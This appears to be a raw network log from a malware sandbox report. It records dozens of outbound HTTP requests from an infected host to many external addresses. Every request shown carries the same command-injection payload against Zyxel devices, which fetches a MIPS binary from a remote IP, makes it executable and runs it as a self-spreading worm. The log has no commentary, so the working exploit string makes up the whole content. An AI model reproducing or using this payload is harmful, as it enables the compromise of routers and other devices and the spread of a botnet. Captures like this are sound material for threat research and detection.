                                        Jan 14, 2024 16:18:50.593179941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5907192.168.2.13452924.2.38.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593254089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5908192.168.2.135077018.92.235.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593256950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5909192.168.2.135506066.178.179.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593274117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5910192.168.2.134013686.58.201.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593331099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5911192.168.2.1346386190.3.231.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593369961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5912192.168.2.1358530173.137.227.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593404055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5913192.168.2.1340564184.133.237.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593431950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5914192.168.2.1351200168.83.34.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593475103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5915192.168.2.133987091.126.181.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593513966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5916192.168.2.1355386173.9.74.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593559980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5917192.168.2.1360246166.210.229.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593596935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5918192.168.2.1358284210.94.112.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593636990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5919192.168.2.135091269.146.75.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593674898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5920192.168.2.1334074179.135.110.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593718052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5921192.168.2.135529474.90.69.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593791008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5922192.168.2.1356268174.143.73.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593823910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5923192.168.2.135810458.214.114.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593847990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5924192.168.2.135247276.239.252.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593872070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5925192.168.2.1357226112.168.92.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593915939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5926192.168.2.1336602139.88.95.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593966961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5927192.168.2.1356878121.232.92.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593993902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5928192.168.2.1342052221.132.233.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594043970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5929192.168.2.1352490146.24.217.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594074011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5930192.168.2.134368097.213.134.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594125986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5931192.168.2.1353498183.56.120.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594166040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5932192.168.2.1350712132.65.76.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594216108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5933192.168.2.134674091.229.113.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594230890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5934192.168.2.135620027.29.59.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594252110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5935192.168.2.134886296.60.252.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594310999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5936192.168.2.1348482180.21.182.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594343901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5937192.168.2.134106644.96.73.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594362974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5938192.168.2.1340546106.57.38.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594392061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5939192.168.2.134932214.45.48.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594430923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5940192.168.2.134862242.10.114.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.594464064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5941192.168.2.1350270221.152.78.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.598910093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5942192.168.2.134096681.45.121.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.598941088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5943192.168.2.1339074118.111.60.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599014997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5944192.168.2.1333794111.56.147.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599064112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5945192.168.2.1338412143.43.70.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599093914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5946192.168.2.134051869.131.181.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599119902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5947192.168.2.1339114193.226.135.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599194050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5948192.168.2.1351072218.242.116.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599222898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5949192.168.2.1334378128.62.252.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599278927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5950192.168.2.135647239.150.186.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599303007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5951192.168.2.133482840.227.191.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599319935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5952192.168.2.1337604142.130.226.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599375963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5953192.168.2.135182273.98.21.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599406958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5954192.168.2.135548819.130.214.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599462032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5955192.168.2.133741885.153.204.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599514008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5956192.168.2.1338612159.150.236.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599545002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5957192.168.2.1342156205.196.204.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599589109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5958192.168.2.1345154121.38.86.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599637985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5959192.168.2.135970823.29.121.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599679947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5960192.168.2.133672614.214.249.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599716902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5961192.168.2.1347554145.25.98.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599755049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5962192.168.2.133422847.230.190.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599807024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5963192.168.2.1358814141.160.241.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599838018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5964192.168.2.1346754183.5.19.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599869013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5965192.168.2.134094886.81.70.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599936962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5966192.168.2.133544292.115.220.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.599960089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5967192.168.2.1350288154.230.180.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600003958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5968192.168.2.134938635.165.8.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600029945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5969192.168.2.1358554102.132.182.219443
                                        TimestampBytes transferredDirectionData
